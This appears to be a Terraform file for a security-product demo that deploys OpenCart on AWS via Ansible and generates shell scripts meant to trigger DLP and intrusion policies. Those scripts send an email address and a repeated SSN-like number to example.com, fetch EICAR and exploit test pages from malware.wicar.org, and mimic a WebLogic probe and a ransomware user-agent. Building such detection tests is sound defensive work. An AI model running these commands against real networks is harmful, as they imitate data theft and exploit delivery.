
// Export Terraform variable values to an Ansible var_file
resource "local_file" "tf_ansible_vars_file_new" {
  content  = <<-DOC
    # Ansible vars_file containing variable values from Terraform.
    # Generated by Terraform mgmt configuration.
    Web_Server: ${var.cisco_mcd_ingress_GWE}
    SQL_Server: ${aws_db_instance.opencart.address} 
    DOC
  filename = "group_vars/tf_ansible_vars_file.yml"
}

// Export Terraform variable values to an Ansible inventory
resource "local_file" "tf_inventory" {
  content  = <<-DOC
    # Ansible inventory containing variable values from Terraform.
    # Generated by Terraform mgmt configuration.
    [dashboard]
    ${var.cisco_mcd_ingress_GWE}
    [dashboard:vars]
    ansible_ssh_private_key_file=/Users/dstoeckm/.ssh/terraform-mcd-key.pem

    DOC
  filename = "group_vars/tf_inventory"
}

// Run Ansible playbook to install OpenCart and SQL dump
resource "null_resource" "ansible_deployment" {
  provisioner "local-exec" {
    command = "ansible-playbook -i group_vars/tf_inventory opencart-aws.yml"
  }
  depends_on = [
    local_file.tf_ansible_vars_file_new,
    aws_instance.web-tier,
  ]
}

// generate .sh script to demo dlp policy
resource "local_file" "dlp01" {
  content  = <<-DOC
    curl -kv https://www.example.com -d "dstoeckm@cisco.com" 
    DOC
  filename = "roles/opencart-aws/files/dlp01.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp02" {
  content  = <<-DOC
    curl -kv https://www.example.com -d "dstoeckm@cisco.com, dstoeckm@cisco.com, dstoeckm@cisco.com,dstoeckm@cisco.com, dstoeckm@cisco.com" 
    DOC
  filename = "roles/opencart-aws/files/dlp02.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp03" {
  content  = <<-DOC
    curl -kv https://malware.wicar.org/data/eicar.com 
    DOC
  filename = "roles/opencart-aws/files/dlp03.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp04" {
  content  = <<-DOC
    curl -kv https://malware.wicar.org/data/ms03_020_ie_objecttype.html 
    DOC
  filename = "roles/opencart-aws/files/dlp04.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp05" {
  content  = <<-DOC
    curl -kv https://malware.wicar.org/data/ms14_064_ole_not_xp.html
    DOC
  filename = "roles/opencart-aws/files/dlp05.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp06" {
  content  = <<-DOC
    curl -kv -d '<method' https://www.example.com/wls-wsat/ 
    DOC
  filename = "roles/opencart-aws/files/dlp06.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp07" {
  content  = <<-DOC
    curl -kv "https://www.example.com/conn.php?data=callback="
    DOC
  filename = "roles/opencart-aws/files/dlp07.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp08" {
  content  = <<-DOC
    curl -kv -H "User-Agent: Buran" https://www.example.com/ 
    DOC
  filename = "roles/opencart-aws/files/dlp08.sh"
}
// generate .sh script to demo dlp policy
resource "local_file" "dlp09" {
  content  = <<-DOC
    curl -kv https://www.example.com -d "604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632 604-29-7632"
    DOC
  filename = "roles/opencart-aws/files/dlp09.sh"
}
//  from line 20   // ${aws_instance.web-tier.public_ip}
// from line 7 //    ${aws_instance.web-tier.public_ip}
 